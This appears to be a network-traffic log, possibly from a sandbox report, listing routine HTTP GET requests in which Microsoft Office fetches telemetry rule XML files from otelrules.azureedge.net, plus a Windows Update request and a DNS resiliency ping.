Source: global traffic HTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=45VhsCwYtemOw1F&MD=6sXZbsPr HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic HTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /clientwebservice/ping HTTP/1.1Connection: Keep-AliveUser-Agent: DNS resiliency checker/1.0Host: fe3cr.delivery.mp.microsoft.com
Source: global traffic HTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
